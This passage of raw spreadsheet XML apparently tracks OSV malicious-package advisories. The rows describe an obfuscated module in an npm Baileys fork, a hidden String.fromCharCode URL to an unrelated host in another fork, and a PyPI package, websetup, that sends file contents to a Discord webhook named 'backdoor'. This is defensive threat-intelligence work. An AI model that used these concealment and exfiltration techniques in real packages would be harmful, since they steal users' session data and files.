@nexustechpro/baileys is a fork of the WhatsApp library `baileys` in which lib/Socket/chats.js (~270 KB) is heavily obfuscated (obfuscator.io-style rotating string-array decoder, hex-escaped import specifiers such as '\x40\x63\x61\x63\x68\x65\x61\x62\x6c\x65\x2f\x6e\x6f\x64\x65\x2d\x63\x61\x63\x68\x65', integer-arithmetic control flow, unicode identifier names, ~2772-entry string array) while every sibling file in lib/Socket/ (groups.js, messages-recv.js, socket.js, registration.js) remains readable JavaScript and the upstream whiskeysockets/baileys ships this file unobfuscated. The obfuscated module is reachable from the package entry point (lib/index.js) and sits directly in the code path that handles WhatsApp session state (authState credentials, Signal identity keys, noise keys, signed pre-keys). package.json additionally declares `"whatsapp-rust-bridge": "latest"`, a floating unpinned tag on a non-upstream dependency, which allows that dependency's publisher to ship arbitrary code (including install lifecycle scripts) into every installer of this package on any future install with no version pin or integrity check.
</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16104</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16105</t>
        </is>
      </c>
      <c r="D99" s="5" t="inlineStr"/>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="inlineStr"/>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>npm:@sahril2nd/baileys</t>
        </is>
      </c>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a3d2089d9678322dc8adbf5e6e740c29d6720133df3489970652a2100641435e)
This package is a fork of the Baileys WhatsApp library that embeds a hardcoded network destination hidden as a String.fromCharCode(...) decimal-ASCII array inside lib/Socket/messages-send.js. The decoded bytes at lines 425 and 436 reconstruct the URL https://fiora.nixel.my.id/ — a host unrelated to any documented Baileys/WhatsApp infrastructure. The destination is assembled at call-time from a numeric array rather than appearing as a plain-text literal, which is a deliberate concealment technique on the message-send code path where WhatsApp session data and outbound message content are handled. Obfuscated construction of a non-first-party destination inside the messaging pipeline of a WhatsApp client library is the shape of session/message exfiltration to an author-controlled endpoint.
</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16105</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16121</t>
        </is>
      </c>
      <c r="D100" s="5" t="inlineStr"/>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>PyPI:websetup</t>
        </is>
      </c>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">websetup@0.1.0 is a single module whose only function, setup.set(text=None, file_path=None) in websetup/sender.py, POSTs the given text and the contents of any local file path to a hardcoded Discord webhook (id 1546817174411288617; the name Discord returns for it is "backdoor") and swallows every exception. Nothing runs on install or import; the send happens when a caller invokes setup.set(). The destination is not configurable, so the package exists to move files off a machine to a channel the publisher controls. The Discord URL is listed under urls only.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e57a4e728de92fb3c7d7693551dec707f4b4c3a92bc1c9eff30eab0f92ac2d93)
The package exposes a single public API, websetup.setup.set(text, file_path), whose implementation unconditionally POSTs the caller-supplied text and the contents of the file at file_path to a hardcoded Discord webhook URL (discord.com/api/webhooks/1546817174411288617/...). The webhook destination is embedded as a class attribute on `setup`, is not caller-configurable, and is not disclosed in the README, which describes the project only as a generic 'websetup tool'. Any program that invokes this API silently forwards its inputs, including arbitrary file contents, to a Discord channel controlled by the package author.
</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16121</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S100"/>
  <conditionalFormatting sqref="E2:E1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00">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2026-09-17T09:51:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T09:51:30Z</dcterms:modified>
</cp:coreProperties>
</file>